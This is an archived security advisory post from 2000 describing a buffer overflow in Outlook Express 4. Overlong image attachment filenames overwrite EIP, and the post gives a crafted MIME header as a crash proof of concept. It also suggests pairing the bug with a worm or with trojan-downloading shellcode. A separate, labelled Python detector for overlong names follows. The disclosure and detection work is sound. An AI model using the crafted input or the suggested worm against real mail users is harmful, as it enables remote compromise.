Subject: Overflow in Outlook Express 4.* - too long filenames with graphic format extension
From: Ultor (Ultor HERT.ORG)
Date: Fri May 12 2000 - 07:05:28 CDT
- Next message: Anonymous: "New Solaris root exploit for /usr/lib/lp/bin/netpr"
- Previous message: Richard M. Smith: "IE Domain Confusion Vulnerability is an Email problem also"
- Next in thread: Ron Moritz: "Eudora Sensitive to Long Filenames"
- Reply: Ron Moritz: "Eudora Sensitive to Long Filenames"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
==== APPLICATION AFFECTED
Outlook Express 4.* (5.* is not affected)
==== DESCRIPTION
All attached graphic files are automatically shown in Outlook Express
while viewing the e-mail. The problem is that long filenames with a *.jpg
or *.bmp extension cause an overflow if the filename length is longer than 256
characters.
==== EXAMPLE
We need more than 267 characters to overwrite EIP because of 'C:\TEMP' at the
beginning of the buffer. This makes exploitation a little problematic. Here is an
example of such an e-mail:
------=_NextPart_000_0008_01BF5479.70140740
Content-Type: text/plain;
name="hert.jpg"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="AAAABBBBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.jpg"
------=_NextPart_000_0008_01BF5479.70140740--
EIP is overwritten here by 'BBBB'.
==== EXPLOITATION
It's a little hard to exploit because the buffer is addressed at an address containing '00'
and we get 'C:\TEMP' which overwrites the stack before our data. You will need
some tricks to exploit this. I believe this bug could be very dangerous if
connected somehow with a worm, because you would only have to view the message to
run the exploit. Using shellcode which downloads a trojan from some URL onto the
affected machine would be an interesting idea too.
Greeetz to HERT,Lam3rZ,TESO
----------------------
Mark Bialoglowy [Ultor hert.org] --- Network Security Consultant
Age: 19 -- Country: PL -- PGP: http://www.hert.org/pgp/Ultor.asc
CODE: C / Delphi / w32asm / Linux / SQL / CGI / HTML / VRML / AI
----------------------
attached mail follows:
- message/rfc822 attachment: crash_oe.eml
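As an added illustration of the condition the post describes (this is not code from the original post, from HERT, or from Microsoft), the following Python check parses a raw message and reports every attachment name longer than the 256-character threshold, looking at both the Content-Disposition filename= and the Content-Type name= parameters since the post's example carries both. The sample message, the boundary string and every name in it are constructed for this example.

```python
import email
from email.message import Message

OVERFLOW_LEN = 256  # length beyond which the post says OE 4.x overflows
IMAGE_EXTS = (".jpg", ".bmp")  # extensions the post says are auto-rendered

def attachment_names(msg: Message):
    """Yield (part_index, name) for each distinct name a non-multipart part
    carries, from Content-Disposition filename= and Content-Type name=."""
    for idx, part in enumerate(msg.walk()):
        if part.is_multipart():
            continue
        names = {part.get_filename(), part.get_param("name")}
        for name in names:
            if name:
                yield idx, str(name)

def find_overlong_names(raw: str, limit: int = OVERFLOW_LEN):
    """Parse a raw RFC 822 message and report every attachment name longer
    than `limit` as a dict: part index, length, extension, auto-rendered?"""
    findings = []
    for idx, name in attachment_names(email.message_from_string(raw)):
        if len(name) > limit:
            ext = name[name.rfind("."):].lower() if "." in name else ""
            findings.append({"part": idx, "length": len(name), "ext": ext,
                             "auto_rendered": ext in IMAGE_EXTS})
    return findings

# Constructed sample modelled on the post's example: one benign attachment
# and one whose filename is 300 'A's plus ".jpg" (304 characters).
LONG_NAME = "A" * 300 + ".jpg"
SAMPLE = (
    "From: sender@example.invalid\r\n"
    "MIME-Version: 1.0\r\n"
    'Content-Type: multipart/mixed; boundary="BOUNDARY"\r\n\r\n'
    "--BOUNDARY\r\n"
    "Content-Type: text/plain\r\n\r\nhello\r\n"
    "--BOUNDARY\r\n"
    'Content-Type: image/jpeg; name="ok.jpg"\r\n'
    'Content-Disposition: attachment; filename="ok.jpg"\r\n\r\n/9j/4AAQ\r\n'
    "--BOUNDARY\r\n"
    'Content-Type: text/plain; name="hert.jpg"\r\n'
    "Content-Transfer-Encoding: base64\r\n"
    f'Content-Disposition: attachment; filename="{LONG_NAME}"\r\n\r\nQUFB\r\n'
    "--BOUNDARY--\r\n"
)

if __name__ == "__main__":
    for finding in find_overlong_names(SAMPLE):
        print(finding)
```

A mail gateway or IDS rule built on the same idea would also want to count the folded continuation lines of a quoted filename, since a client may join them before copying into its fixed buffer.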